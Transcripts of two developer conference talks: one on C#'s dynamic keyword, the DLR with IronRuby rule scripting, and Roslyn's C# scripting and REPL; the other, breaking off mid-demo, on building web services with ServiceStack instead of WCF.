Now, the dynamic object class, if we try to overwrite stuff, you see that it has all these try things, try binary operation, try a convert, try, try, try, try, try, try. This actually represents all the things that you can do on a class in.NET, okay? So anything that you can do on a class, you can intercept with your code and do something else, okay? So what I did, try invoke member, is just when you invoke a method, I just wrote the name of the method, and if you look just on the arguments, you have a binder which just says the name of the method and some more metadata. You get all the arguments passed to this method, and you can send back a result, okay? So what I did, I just put null in the result because I don't want to return anything. Then I returned true because if I had returned false, I would have gotten an exception, like method was not found, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah. Okay? So this is, you see, this is very simple, right? Now, it's not like only for people who talk to you and you don't know what they're saying, but they're saying smart stuff, right? So many people like that here. So as a regular person, I can do this as well, so it's good. So this is one thing. Now, I want to show you just a cool thing that I did with that because log method calls object is a great thing, but I'm not sure you really want to use this. So I've created something called a super finder, right? Because it finds things in a super way. How many of you have seen Active Record? Right. Okay, Active Record is an ORM in the Ruby on Rails world. And they've got like cool methods, they call them magic methods, that you can go ahead and do, like, if you have a user object, for example, go ahead and do user dot find by and then the column name, okay, so if you have like an address, for example, an under its column, you can go find by address and do something like this is the value. And this would go and query the database according to the address column and the SDFD value, right? And if you had another column, which is, I don't know, age, you could just write find by age and then put something like that, okay? So, kind of cool, kind of very explicit and you can read it, read through the code, you don't need to do these weird queries. So I wanted this in.NET, right? So what I did, let's remove the return here, let's remove all of that because you've seen that already. And what I did, I created a data table, now don't kill me, I know data tables are evil and data sets are a thing that need to be dead and done, but it just works good for the demo, so don't kill me, please. So I have a data table, you can see how it looks like, it's just this very simple data table, it has one table and two columns, ID and a name, and each column has these records like one in Norway, two in Sweden, okay? So this is the data table and then I can create a new super finder and pass this data table and I get a dynamic object in return. Then I can go on and do finder.findByName, this is the column name and this is the value, right? And if I wanted to query by ID, I could go ahead and do find by ID and do free, okay? And this would work as well. So kind of like active record, I could go ahead and like if I had another column, I could go, I don't know, find by a continent, okay? And this would work as well. So let's return that, find by ID would be cool. So you can see that it actually works. Yeah, demo five is good. 
So let's run that. So you see it gives you free Denmark. So it works. Just tell you that. Let's see how I did that because again, it was very easy. This is my super finder class. It extends the dynamic object, right? And I have a constructor, it receives the data table and then I again, over it in the try invoke member method. And then only if the name of the method that is called starts with find by because this is what I want to allow, I'm going ahead and do something. Otherwise, I just return the base try invoke member, which here would throw an exception, but you can do other stuff as well. So once I have this, if here, what I'm inside, I just remove the find by from the method name, and then I have the column name, right? And so I have the column name, I have the value from the first argument. This is just for the query. So I have this number sense there. And then I do a select on this data table, just a query, right? And return the result. This is the result that is being returned. And that's it. Super easy. Like, I don't know, six, seven lines of code. And I have this super method that I can just put the name of the column and find it by that. So you see that you can give C sharp super powers using that. Like, you can't do that otherwise, right? It would be a crazy thing to do that in a different way. It's so easy. And you see that the result also returns a data row. So again, once you go dynamic, you don't need to change your entire code to be dynamic, right? So again, this is a really cool use case. And you would see actually something like that in a massive and simple data, which have these kind of methods as well. Okay? Cool. Now, let's continue. Well, that was dynamic. If I have more time after that, I'll show you some more stuff about it. Now, moving on to the DLR. How many of you have used one of the DLR languages like Iron Ruby or Iron Python? Raise your hand, all of you, just to make me feel better. Thank you. Thank you. Okay. So the DLR is actually a part of the.NET framework,.NET 4. And Iron Ruby and Iron Python were written on top of that. And C Sharp and VB actually take advantage of that, of the DLR. And the idea of the DLR is just to provide services to dynamic language implementers, just like the CLR provides services to static languages, right? It's the same idea. And the DLR is just written on top of the CLR, right? So they have CLR and DLR, and next they will have ELR and then FLR. Who knows? Yes. So let's just see how it's written, right? So the first thing it has is expression trees. And the idea here, expression trees just represent your data, not your data, your syntax in a tree, right? The syntax gets translated to a bunch of objects which represent your syntax, okay? Now, so if you're a dynamic language implementer, you would want to take the syntax, write an interpreter that takes the syntax, translates that to an expression tree, okay? This is what you do. And then you have this expression tree. You give it to the DLR. And now, once the code starts executing, it gets to a point where there is a call to something, method, field, whatever, which is not inside the context, right? And it needs to go out of context to find and call whatever it needs to be, it asks to be called. So this is why they have this thing called dynamic dispatch, which is go out of context and tries to execute what you want. And this uses binders, okay? So once, like, for example, Ion Ruby tries to execute something from the.NET framework, it would go and use this object binder, right? 
And maybe IronPython code tries to execute some IronRuby code, so it would go and use a Ruby binder from Python. Okay, so you can see that all of these different worlds, and you can see binders for .NET objects, JavaScript, Python, Ruby, COM, can now interact thanks to this dynamic dispatch feature, okay? So it's kind of cool. Last but not least is what's called call site caching, which is just a caching mechanism. Once you run code, you interpret it and then execute it; the next time you execute it, you won't have to interpret it again and again and again. So the idea is that once your dynamic application is running, it runs faster as time goes by, because everything gets cached, okay? So these are the three main pieces of the dynamic language runtime, the DLR. And on top of the DLR, as I said, sit IronRuby and IronPython. They started as a Microsoft thing, now they're open source. If you want to contribute, go ahead, we need you. If you want to buy a book about IronRuby, it's down there. Now, C# and VB.NET take advantage of the DLR when you use the dynamic keyword, right? All the binders and dynamic dispatch stuff get used once you go ahead and work with a dynamic object in .NET. Other languages were written on top of it as well. For example, someone created IronJS, which is a JavaScript implementation on top of the DLR. Someone tried to do IronScheme for Scheme. Someone did Nua, which is an implementation of the Lua language. And also this, it runs. This is LOLCODE. It runs, really. So HAI starts the code. I HAS A FISH ITZ YUMMY is just fish equals yummy. VISIBLE "HAI WORLD" is just Console.WriteLine. IM IN YR LOOP starts the loop, KTHX ends the loop, and KTHXBYE ends the code. So this actually runs. Someone from the DLR team created a kind of proof of concept with it. If you go and look for LOLCODE online, they have a specification for the language, so it's a real language. I haven't met anyone using it in production yet, but you never know. If you do, send me an email so that when I do these talks I can show your name or something. So I'm going to show you not this, but what you can actually do with the DLR in your applications. And I know you're not going to go and now write all your code in IronRuby or IronPython. But I think there are several cases where you can take these languages and incorporate them into your application, and they will make perfect sense there. So let's close all of these and go to this thing here. Let's run it. This is my great, great awesome rule engine. Thousands of man hours spent on the design of this thing. Now, I can go and click here and I have these validation rules. And I can go, let's see, go textual and let's say the max length can be three, and save it. So once I type AA it's happy, and when I type AABBBBBBBB it's sad. You see how many design hours were spent when you have this white background. Yeah, well, I'm not good at designing things. Anyway, now, what's wrong with that? It's cool, but then it goes out and it gets to the customer, right? And don't get me wrong, I love customers, right? We all love customers. But customers tend to have weird requirements from time to time. Now, what do you do when a customer comes and says to you, well, your rule engine rocks, but now I want the value to start with the letter C, otherwise I want it to fail? Well, you say, okay, cool.
And you go and add this feature here. So now you have like, I don't know, checkbox says and you can choose this first letter as C rule, right? And now comes another customer. And you love them too, right? But they have another weird requirement. And then you have another customer and another, and it goes on and on and on. So I say, give power to the people. Let them write the rules. And you just count the money, right? So you can do that today, like with a math or some extensibility frameworks. But I think for something like that, which is just simple rule engine, you need a simpler solution, right? So what I'm going to do, I'm going to close this. I'm going to open this, change this to true. And I'm kind of done. Crazy, crazy thing. And now I have this thing here. Okay, custom rules. And this is actually an iron Ruby text box. Okay, I can write iron Ruby code, which interacts with my.NET code. And this is where I write my custom rules. So if this customer comes and say I want this first letter as C, he can just go here and say, if value, the first letter equals C, then we turn true. And else return false. And then this you don't need. And that's it. We click save. Let's put textual here. Click save. And now we see something. The validate is happy. But if we start with something else, it's sad. Okay. So now we gave power to our customers to write these custom rules. It's very easy because it's very simple. Not just, they don't need to create a DLL and assembly, I don't know, implement some interface. They just need to write a simple rule right there. And that's it. Okay. This is iron Ruby. You can do this with Python as well. Now, and you probably think, well, it's probably would have been crazy to write that like 1000 million gazillion hours. Right. No, actually no. I just needed to download iron Ruby, use their DLLs, reference them and then add three lines of code. That's it. Nothing more. Let's do that. See, let's even do that. Now it really seems like three lines of code. This is it. Right. The first line just creates the Ruby engine, right, which is just where all the language interpreter lies. Then I need to expose something to the script, right. I want to expose the value of the text box. So I just expose it to the script with a value, a variable named value. And then I execute the code from this text box and get a Boolean in return. That's it. Done. Finito. Right. So this is very simple. This is a really big use case in my opinion for all the DLL languages because it just makes so much sense to use it. Right. So, yeah, this is just one example. I have more, but I don't have time for that. But this is really a big, big example of how you can take advantage of the DLR in your current applications for these simple solutions. Okay. So, yeah, you can see this again. Moving forward to the last part, which is Roslyn. How many of you came to my session about Roslyn? Oh, thank you, sir. It was fun. It was fun. You should look at the video. Anyway, how many of you have heard about Roslyn? Okay. Cool. So Roslyn is the new C sharp and VB compiler. Okay. It's not yet the compiler. It's still in CTP. But it will be the next compiler. It's written in C sharp and VB.net. Right. They write the C sharp compiler in C sharp and the VB.net compiler in VB. It's the largest VB.net project inside Microsoft at the moment, by the way. They don't use it either. Anyway, Roslyn has four parts. It's not just the compiler, right? What I like about Roslyn is that it's just not just the compiler. 
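Before moving on to Roslyn, for reference, those three lines of IronRuby hosting code from the rule-engine demo are roughly the following. This is a sketch using the DLR hosting API; the text box names are my own, and exposing the value through a script scope is one way to do what the demo describes.

    using IronRuby;                        // IronRuby.dll plus Microsoft.Scripting.dll
    using Microsoft.Scripting.Hosting;

    ScriptEngine engine = Ruby.CreateEngine();           // 1. create the Ruby engine
    ScriptScope scope = engine.CreateScope();
    scope.SetVariable("value", valueTextBox.Text);       // 2. expose the text box as "value"
    bool isValid = engine.Execute<bool>(customRuleTextBox.Text, scope);  // 3. run the custom rule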
Roslyn took the idea of compilation and expanded it over everything related to the compiler and compilation. For example, think about it: the compiler compiles code, and code is written inside an IDE, and in .NET the IDE is Visual Studio. So they took the experience of writing Visual Studio add-ins and enhanced it. And they took the way we work with solution files and made it better. So everything that is related to code is inside Roslyn, and they try to make the experience better. The first part is the compiler. You can compile code, you can get the syntax tree, you can intercept your code before the compile process: get the syntax tree, change the syntax tree, and then execute the compilation. It's kind of cool, and there are so many things you can do with that. I'm not going to show you the compiler APIs today, but look at the video, right? Scripting is cool, and I am going to show you scripting, because it kind of allows you to use C# as a scripting language, which again opens up a bunch of new opportunities. Workspace: how many of you have needed to open a solution file in a text editor and change it by hand? Right, okay. How many of you liked it? I know. So what they did is take the entire thing and create an API for it, and now you can go through the solution file, the projects, the files inside; add, remove, and update files; all via an API. An API that makes sense, right? Not one where you need some fancy degree or something like that. So it's really nice, and you probably won't need to go and change stuff manually in solution files anymore in the future. So thank you, Roslyn team, for that. Now, Services is the last part, and it's just a way to write Visual Studio add-ins, okay? And in the context of syntax, right? So you can write refactoring tools very easily. So this is the idea, and again, writing Visual Studio add-ins, if you have tried it, is not a nice thing, okay? And "nice" is, well, you don't want to go there. Anyway, Services is trying to make it better, and they actually use MEF, and it looks nice, and you can read the code and understand it, which is good. Okay, so these are the parts of Roslyn, and let me show you the scripting part. How much time do I have? Okay, cool. So, first one. Let's go here, and I'm going to add a new item, okay? Maybe I shouldn't have done this here, but let's see. Yeah, well, I'll go here and add a new item. And now, once you install the Roslyn CTP, you have a Visual C# Script item. Ooh, script and C#, those didn't go well together before. Let's edit it, okay? And what you can see is the difference: you don't have classes, you don't have methods. You just write your code right away, okay? So all the ceremony of C# goes away. You can write what you need, just like a script, so I can do a Console.WriteLine, of course, because that's what you always need, and print yo dog, yeah. And no, I don't need a semicolon there, it doesn't make sense. Yes, you can actually write classes and methods here, but you can also just do that. And now you save it, okay? Let's copy the full path of this thing, and let's open CMD. And you have something that is called rcsi. Let's see if this joke works: CSI: Miami, rcsi: New York. I'm going down. So you have rcsi, which is just a compiler that then executes this C# script, right? So let's just do that. This is my C# script.
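Something like this, assuming a script file named hello.csx (the file name is mine; rcsi.exe is the script runner that shipped with the Roslyn CTP, so the exact command may vary by build):

    // hello.csx: no namespace, no class, no Main, just code
    using System;
    Console.WriteLine("yo dog");

and then from a command prompt:

    rcsi hello.csx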
It ends with CSX, okay? So I start with R-CSI, and then with SCS-CX, and I click Enter, and you see Yo-Dog. Okay, so you now have scripts in C-Shop, okay? Which is kind of cool. You can just have it, write you, what's something you need, and just execute it wherever you want. So this is a cool thing. Another thing that you can do with the services, not the services, the script in API is writing a REPL. How many of you know what REPL is? Okay, cool. REPL is a read-the-value-it-print-loop application, which means that it is just an application that gets lines of code. You write the code, you click Enter, and the code gets executed, okay? And then you write another line of code, click Enter, and it gets executed again, right? So just like dynamic language developers have had for many years, right? So 2012, and we now have these two. Let's run my Roslin fun code. And now we have a C-Shop REPL console, okay? And now I can go ahead and do a public class, yo, public void print, system.console.writeline, um... Yeah. And click Enter, and now I have this class. And now I can do var y equals new yo, y.print, and you see it says yo. And it's kind of cool. You can actually move away from Calculator and use it instead, okay? So it does that, and it's crazy, crazy calculations. So you see you can just interact with C-Shop in just this cool REPL window, and you can load your assemblies, for example, and write, just try them out. Like load an assembly, try some methods or something like that, which would be a good example for that. Now, this thing here has the craziest, best feature of all times, right? Bye-bye. And it quits. Now, how did I do that? Let's go here. Very simple, actually. I just have this scripting host class. I will show you that in just a minute. And this just takes care of all the input and output for the user. So until you get a bye-bye, just execute the code line and output the result. Okay, this is the entire idea here. Now, let's see the scripting host. This uses the Roslin scripting APIs, and you see I have a script engine and a session, okay? The session is here just so you can save the lines of code that were interpreted already. So once I wrote the class definition, the next line would say I can actually use this line, okay? So this is why I need the session here. So I have, like, an iterative compilation. And I have the session. I have this script engine. And if you remember the Iron Ruby example, kind of the same. This is the engine for C sharp now. These are the assemblies that I load, okay? Just like add reference, just from code. And this is the using statements that I want to have, okay? So I just use that for the script engine. So now I have the engine and the session, and all I need to do is just call execute. We just call engine.execute and passes the code line and the session. That's it, okay? This is very simple. Very, very simple, very cool for this HitchRapel example, which is not that, but anyway, you know what I mean. Now, another really cool thing in Roslin is that once you install the CDP, you can go to view... C sharp interactive window. And you got the interactive window, the Rappel thing inside Visual Studio. So you can go ahead and do console.writeLine. And I don't know if you noticed, but I have IntelliSense here, which is kind of cool. And I can go ahead and do this stuff and I get immediate results, okay? So again, you can load your assemblies here, try it out, and just see what happens, okay? 
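The scripting host behind this home-made REPL is worth sketching. The Roslyn scripting API changed between previews, so the names below (ScriptEngine, Session, Execute) should be read as an approximation of the CTP code described above, an engine configured with references and usings plus a session that remembers every line executed so far, rather than as a stable API reference.

```csharp
// Rough sketch of the REPL's scripting host on the Roslyn CTP (names are approximate).
using System;
using Roslyn.Scripting;           // assumed CTP namespaces
using Roslyn.Scripting.CSharp;

public class ScriptingHost
{
    private readonly ScriptEngine engine;
    private readonly Session session;

    public ScriptingHost()
    {
        // The references act like "Add Reference" done from code,
        // and the namespaces act like implicit using statements for every line.
        engine = new ScriptEngine(
            new[] { "System", "System.Core" },
            new[] { "System", "System.Linq" });

        // The session keeps everything executed so far, so a class defined on one
        // line can be instantiated on the next: an iterative compilation.
        session = engine.CreateSession();
    }

    public object Execute(string codeLine)
    {
        return engine.Execute(codeLine, session);
    }
}

// The console loop around it is then just: read a line, stop on "bye bye",
// otherwise Execute it and print whatever comes back.
```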
And also, if you're not sure about the method, how it reacts to different parameters, you can put it here, just write it, see what happens, and go on with your life. So it's cool. And of course, of course, you don't need to calculate it anymore. You have it here inside Visual Studio. You don't need to ever leave Visual Studio again. So, yeah, it's very cool. However, this interactive console does not support buy-buy. It just doesn't know what to do with that, like error and stuff. So this is Roslin. This is just the compilation, the scripting APIs. Of course, Roslin has much more than that, but you see how cool it is and where it's going. Okay, so I think we'll just have questions now, because we have not a long time left, and then I'll summarize them. So, questions. Yes. Will Roslin be part of the Visual Studio 2012? Okay. The question was, will Roslin be part of Visual Studio 2012? And I don't think so, because they've just released another CDP, and they're not in an RC or RP or whatever they call it now. So I'm not sure. I'm pretty sure that on Visual Studio Vnext, this would be the compiler. The CSC.exe would go away. Okay. More questions. Yes. Regarding performance with Dynamics, when you first have gotten a map of things to a call-side cache, is it done almost or as fast as calling a traffic that's a compiled map of a... The question was about the performance of the dynamic keyword, which is a great one, because I can show you that. So, thanks. Let's do that. Let's go back to this, and for example, the first demo. Okay. So let's just remove that. I told you that there is this call-side caching thing, so once you call the method once again and again, you get better results. So let's do that. And I have this thing here. Yeah, it can't be prepared. Okay. So add. So I just use stopwatch. Okay, to show you how much time did it take. Now let's run it one time. Let's go to program. Demo one. And starting project. And run. Okay, so this took five milliseconds. Once. Okay. Cool. This took five milliseconds. Now let's do this for a thousand times. Let's run that. Took five milliseconds. Okay. 100,000. Okay. Did I answer your question? Okay, I can go on and on. Yeah. I can. Okay. I saw. So you see, the performance, you do have like a small amount of time at the beginning to do the interpretation. But once you go through this line, you're kind of good. Okay. More questions. Yes. The question was whether the interactive window for us in, once you are in debug mode, would it load with the state and the context of your application? It makes a lot of sense, but no. Right now, the CDP actually doesn't, it has some limitations, like it doesn't support dynamic and some other extreme stuff. So it might not work for some stuff. But once it out, it would support everything. And it sounds like a good idea. So I'm sure someone would do that. But right now, it's not. One more question. Or not. That's it? You're all shocked. What just happened? Okay. Okay. So let me summarize. So, cool. So we started with the dynamic keyword. I showed you some different things that you can do with that. I really believe that dynamic keyword has a place in the.NET world. Like, I know a lot of people don't use it, but you see that there are uses just, you can just go ahead and use it. And it makes your life easier. So why not? Right? If you can, why not? You can do something in one minute instead of ten. I don't see the problem. The DLR, again, has a space in the.NET world where it fits. Right? Where it fits the most to you. 
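Circling back to the performance question for a moment, the measurement shown is easy to reproduce. A minimal sketch (Calculator and Add are placeholder names): only the first dynamic invocation pays for binder resolution, after that the DLR call-site cache is hit, which is why 1, 1,000 and 100,000 iterations all land in the same few milliseconds.

```csharp
using System;
using System.Diagnostics;

class Calculator
{
    public int Add(int a, int b) { return a + b; }
}

class Program
{
    static void Main()
    {
        dynamic calc = new Calculator();
        var watch = Stopwatch.StartNew();

        int result = 0;
        for (int i = 0; i < 100000; i++)
        {
            // The first pass creates and caches the call site; the rest reuse it.
            result = calc.Add(i, 1);
        }

        watch.Stop();
        Console.WriteLine("100,000 dynamic Add calls: {0} ms (last result {1})",
                          watch.ElapsedMilliseconds, result);
    }
}
```

That, in miniature, is why dynamic is usually cheap enough to reach for wherever it genuinely simplifies the code.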
If what I showed you makes sense, go ahead and use it. If other things that you can think of make sense, go ahead and use them. It's right there for you. It's not going away. I'm not sure if I said this before: the DLR is a part of the .NET Framework. And I don't know if you know, but the .NET Framework is like Alcatraz for stuff. Once something goes in, it never goes out. So the DLR is there, it will be there forever, and you can take advantage of that. And last but not least is Roslyn, which I believe is going to change a lot of stuff in the .NET world, because you will see metaprogramming in .NET, new keywords coming to life, stuff like that, which will make your experience with C# much more interesting and, at the same time, much easier, I think. So yeah, Roslyn is something to look forward to. I definitely want to see what happens when it gets out and the community takes over and starts to use it and do great stuff with it. Resources: ironruby.net and ironpython.net if you want to download this stuff, and the MSDN Roslyn page (msdn.microsoft.com/roslyn), where everything is there: documentation, downloads, everything. AmazedSaint (amazedsaint.com) is the guy who wrote ElasticObject. He is a super smart guy, so just go and look at his blog and get your mind blown. Yeah. That's it. So if you have any more questions, just come to me afterwards. Find me at the conference. Send me an email, tweet me, I don't know, something like that. I will be glad to help. I hope you have a good day today. Thank you very much for being here. Thank you.
|
.NET 4 has brought us the DLR and C# 4 has brought us the dynamic keyword. With their powers combined, C# suddenly gets super powers! In this session Shay Friedman will show you surprising and practical things you can do with C#, the dynamic keyword, the DLR and IronRuby!
|
10.5446/50990 (DOI)
|
So, can anyone hear me? Yep. It's nice to see that more than two people turned up, so it's going to be fun. I'm here to talk about Service Stack and how many have heard about Service Stack or used Service Stack? So, around five or six people. That's great. I'm mostly doing this to inspire people and say there's other stuff than Web API or Nancy or whatever you want to use. So feel free to leave if you don't want to be inspired. Why I'm here? As you can see, I'm a developer at a company called Atia in Denmark and I'm pretty sure some of the Norwegian guys have heard about Atia, but it's an IT infrastructure and we're like four or five developers out of 1500 workers, so it's fun. I've done.NET development since 2002 and I think it was probably.NET 1 back then and did Silverlight last year with a lot of web services and as you can see, I kind of got caught in a discussion on Twitter around November. I might have made a mistake by saying that I didn't mind WCF. It was great. I had no problems with it. That pretty much went right back in my face later on. And I got annoyed by the RPC style you tend to do in WCF. And I assume you're all nerds, so you're probably going to like being here. It doesn't matter what you use or who you are. It's going to be fun. So what are the bad ideas for doing web services? If we look at the code generation, how many people have tried a WCF service adding it as a reference and the code just doesn't work? You get an external tool error, something, something, around half of you. And did it tell you how to solve it? No, absolutely not. And what happens when you change the service and update the reference, check in the code? What happens when the other developer actually did another method as well? Just blows right in your face and you have merge conflicts all over. That's some of the fun stuff. And then we have the archaic XML configuration. I think everybody can agree on that we should kill XML configurations as much as possible now. Yeah, as I said before with the mergers, I've actually seen a guy by mistake pushing stuff to a production server and it almost killed all the data in the server. So that was no fun. And then we have defaults. How many have been fighting defaults in WCF? Max objects and graph? Does it sound familiar? Or timeouts? And why do we have to go and set values? Why not use reasonable defaults? It's taken directly from Demi Bellard's words, the guy who primarily do all the coding on service stack, but have reasonable defaults. There's no need for us to go into these default configurations and overrides and so on. They should just be working. Fixed serialization. I haven't dug really deep into WCF if I could publish two serializations on the same endpoint, but wouldn't it be nice just to say, I want this to run JSON and by the way, if you can handle my XML and some other formats as well, that would be great. It would be awesome. I don't need to do new stuff if we get new developers. And the RPC style, it's a maintenance hell, as I said. And we have chatty services. It's not really a bad thing about WCF or any other framework. We should be bulking stuff instead of just pushing small method calls all the time. So that's some of the bad stuff. And as you can see, you've been burned before. Don't do it again. So what is this weird service stack thing? The official subtitle is, WebServices done right. Rest services done easy. Yeah, I remember that correctly. I'm not going to go into this huge rest debate today, hopefully not. 
But it's really, really easy to get up and running and do some REST services if you want. I'm going to show you how later. Simple and model driven: if we put our models in a separate assembly, we can pretty much share them between the server and the client. We've done that in WCF as well, but this is the primary focus of Service Stack: start with the model, don't start off by generating weird stuff on the client side. Endpoint ignorant: that's the serialization story I mentioned; you can pretty much get any format you like out of Service Stack. It's IoC based, and everything should be IoC based these days. Easy access to HTTP: I'm going to show later how we can pretty much just push HTTP status codes or pull stuff from the request and so on; it's in the box. Fast as lightning: I don't know if anybody has heard about the JSON serializer from Service Stack. Yeah, a few of you have. At the moment it's the fastest one. I'm going to come back with a graph later on so you can see the stats; it's amazing how fast it is. And I saw a guy called Mike Strobel the other night tweeting to Demis Bellot: "I think I found a way to increase the speed by 25 to 33%." When you're the fastest, and you're somewhere between six and thirty times faster than the other ones, it's pretty impressive to find another 25%. Cross platform: anybody running Mono in here? A few guys. Awesome, you're going to like this. Oh yeah, and the clients are in the box. We don't generate any clients on the client side; we just use what's in Service Stack to grab the data. Yep. What's in the box? If you get the NuGet package called ServiceStack, you're going to get ServiceStack.Text and you're going to get ServiceStack.Common; that's pretty much what you need if you run on the client. And then you get Redis support and a micro-ORM called OrmLite. That's in the box. I would have preferred it leaner: I don't see why I should get Redis and the SQLite/OrmLite bits in the default configuration. I really have no need for them, and it's just a pain to have assemblies you don't need. And then we're going to look at some code. That's going to be a lot of code. I hope you'll stay awake for it, and I'm probably going to make a lot of mistakes so you can point and laugh at me. Yep. We're going to start off with IService. IService is the basis of a service running in Service Stack. You can build your services directly from IService. It's not recommended, but you can do it. If you go for ServiceBase, they've done some error handling for you, like wrapping exceptions, putting them in a nice shape and sending the right error codes from time to time. And you have RestServiceBase. It's pretty much a question of which flavor you like: are you going to go for the single Execute method, or are you going to go the REST way? And you can do other stuff as well. Yeah. And well, just in case you didn't notice, you can cut off an arm. It's really easy to do. But if you like your teddy bear like that, you can do it. But now let's look at some code. It's way more fun, I'm pretty sure. So I have my great solution here and I've added some references. There's a lot of Castle Windsor stuff and RavenDB, not important. But I pulled in Service Stack, and as you can see, it just pulled in the rest of it. That's actually quite easy to get going. As far as I remember, if you do it in an MVC project, it's going to set up some of the stuff I'm about to set up automatically. But I decided to go on my own. So here we go.
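Roughly, the setup walked through next boils down to the sketch below: a handler mapping in web.config that routes everything under /api to ServiceStack, plus an AppHostBase that names the service, points at the assembly holding the services, swaps in a Windsor adapter and tells ServiceStack it lives under the /api subfolder. ApiHost and WindsorContainerAdapter are names assumed for the demo's own classes; the ServiceStack v3 types (AppHostBase, EndpointHostConfig, Funq's Container.Adapter) are real, but treat this as a hedged reconstruction rather than the demo's source.

```csharp
using System;
using Funq;
using ServiceStack.WebHost.Endpoints;

// Global.asax.cs: initialise the host exactly once.
public class Global : System.Web.HttpApplication
{
    protected void Application_Start(object sender, EventArgs e)
    {
        new ApiHost().Init();   // forgetting Init() is the "minor defect" that bites later in the demo
    }
}

public class ApiHost : AppHostBase
{
    // Service name plus the assembly ServiceStack should scan for services.
    public ApiHost() : base("NDC drink card service", typeof(ApiHost).Assembly) { }

    public override void Configure(Container container)
    {
        // Use Castle Windsor to resolve services instead of the built-in Funq container.
        container.Adapter = new WindsorContainerAdapter();   // your own IContainerAdapter implementation

        // Not hosted at the site root: everything lives under /api
        // (the matching web.config handler maps path "api*" to ServiceStackHttpHandlerFactory).
        SetConfig(new EndpointHostConfig { ServiceStackHandlerFactoryPath = "api" });
    }
}
```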
First of all, we need to register the correct handlers. As you can see, I have a location called API. And that's pretty much going to be a subfolder where I'm going to host my API. If you run the MBC project, it automatically puts it at an API. So I'm just going to create that, taking the slow road. So now we have the API folder. And that one should just go away. And then I have some stuff in my global ASACs. I'm going to come back in a minute when I've done the API host. You pretty much set up an app host space, as far as I remember, to run all this stuff in. You can hook up different stuff inside the app host. But just to tell you a short story, I've added some drinks to my RavenDB. I'm pretty sure everybody had a drink or two during the week. And what an obvious topic for the last session on a Friday. So it's going to push some drinks into my RavenDB. And then we'll be able to make some drink cards later on. Pretty much have a drink card with the name and type of drinks or the drinks. And then you'll find out if it's an evening card, noon card, or whatever it is. And there's a small trick you can do in Service Stack. How many know about the mini-profiler, Sam Saffron, and some other guy did? Or any other profiler you can run just pushing it? Or is it Glimpse, the other one? I think so. Well, support for mini-profiler, let's build in. Let's just leverage that. And then I have my API host. And then I'm going to push in an app host base. That's quite easy, but I get some stuff I don't want. That's a bit too much. Let's see. I have a... Where did that go? Yeah, in case you use another IOC, then the funk one that's built into Service Stack, you give it an adapter. So pretty much I'm getting my Windsor adapter. I have somewhere else. And I'm just going to say it was a container adapter, as far as I remember. Yep, and as I said, a lot of misspelling. Then we'll supply a service name. Could be drain... NDC, drink cart service. And then I have once an assembly as well. API host assembly. And then we want to do some configuration. That was pretty much most of the setup we need to do. But since I decided to put stuff in a subfolder, I need to do some set config as well. And I'm probably going to do this wrong. Let's see if I can remember which one it is. So much stuff to remember on this. So pretty much what I've done here is just set to a service stack host that I'm actually not hosting in the root directory. I'm hosted in the API folder. So the handle is set up for the API folder and service stack is now set for API folder as well. And that's pretty much it, except that it's not much fun doing web services without a service. So we're going to create a basic service as well. Let's see. We're going to create a drink service. Here we are. I could go for the iService if I wanted to. It would look like that. And I could say drink. Then I will get this. That's all nice. And I've actually got some services I need to refactor because I did the iService before actually read on upon the stuff, but legacy stuff, running in my private stuff so it doesn't really matter. If I wanted to expand this, I could actually do it. If I just wanted to support the get keyword from REST, I could just add a partial interface for it. Now what would happen if I call the service, if I did a post or anything like it, it would actually go for the execute method. If I do a get, it hits the get method. So you can actually have different flows in your service. That's pretty cool, but I'm not going to use this. 
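Side by side, the three flavors mentioned earlier look roughly like this in the v3 API, with Drink standing in for the request DTO used throughout the demo. The bare interfaces give full control but no help; ServiceBase funnels every verb into one Run method with error wrapping done for you; RestServiceBase lets you override only the verbs you care about.

```csharp
using System;
using ServiceStack.ServiceHost;       // IService<T>, IRestGetService<T>
using ServiceStack.ServiceInterface;  // ServiceBase<T>, RestServiceBase<T>

public class Drink { public Guid Id { get; set; } public string Name { get; set; } }

// 1) Bare metal: everything hits Execute unless you also add verb-specific
//    interfaces such as IRestGetService<T>, which then catch their own verb.
public class RawDrinkService : IService<Drink>, IRestGetService<Drink>
{
    public object Execute(Drink request) { /* POST/PUT/DELETE land here */ return null; }
    public object Get(Drink request)     { /* GET lands here */ return null; }
}

// 2) ServiceBase: a single Run method, with exceptions wrapped and mapped
//    to sensible status codes for you.
public class SimpleDrinkService : ServiceBase<Drink>
{
    protected override object Run(Drink request) { return null; }
}

// 3) RestServiceBase: override per verb.
public class RestDrinkService : RestServiceBase<Drink>
{
    public override object OnGet(Drink request)  { return null; }
    public override object OnPost(Drink request) { return null; }
}
```

The demo switches to ServiceBase next for exactly the reason in the comments: the bare interface leaves the error handling entirely to you.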
This is just way too hard and I need to do error handling and so on. So we're going to delete that. And that's more fun. And you might have noticed that this time it's a run instead of an execute. Somehow I'm a bit split. It could have been the same. Just would have been easier to change it. But well, who cares? Now if I want to request a single drink, I could just do request drink ID. That was different from my GUI.empty. Then I could just, oh yeah, I know what I need. I'm running a RavenDB so I might want to get hold of my document session. And if somebody looks at my code later on and you see the registration for RavenDB, yes, it is wrong. I have the wrong lifestyles. So I just want to grab that single drink. So we'll do a drink. It's pretty easy. And then I can just return that drink if I want to. Usually, you end up having a drink response. Because wouldn't it be nice to just get the same response and if I get one in this list, well, I have one drink. If I have many, I have many. It's just easier to pack stuff up and do batch loading. So I'm going to return a new drink response. Yeah, like this. Go away. So now we have actually done our first service, but we kind of want an option to get all the drinks as well. So we're going to just add drinks. It's fun looking at me writing queries to RavenDB, right? And misspelling. So, a new drink response. So that was pretty much it for our service. As you can see, it's pretty easy to do a web service and service stack. It doesn't really require much code of you, and that's pretty much it. One thing you need to do before you get it up and running, you need to add a route as well or route or however you want to say it today. And that is most often for me done in the app host base. You can decorate your DTOs, but I don't like decorating my DTOs for service stack when they're in a different assembly. That just seems so wrong for me, and somehow I don't like putting attributes everywhere. So I'm going to add a drink, and that would be most likely be drinks. So now we could get the drinks, but we kind of wanted the option to get a drink, a single drink as well. So we're going to add another one, and we can do drinks, and hit something wrong. And do the ID. Does that seem familiar when we're talking about RESTs? I hope so. And hopefully everything builds and runs. Yep, it's succeeded. That's fun. One of the awesome things about service stack is that it's actually quite intelligent, because it's going to look at my code now and generate a meta page for me at some point if I did it right. Oh, yeah. It doesn't matter how many app hosts you do if you don't actually start it up. Minor defect. Yep. So now we should have a service. Except I come to stuff out in my installer as well. Now this is fun. How many did come to see me 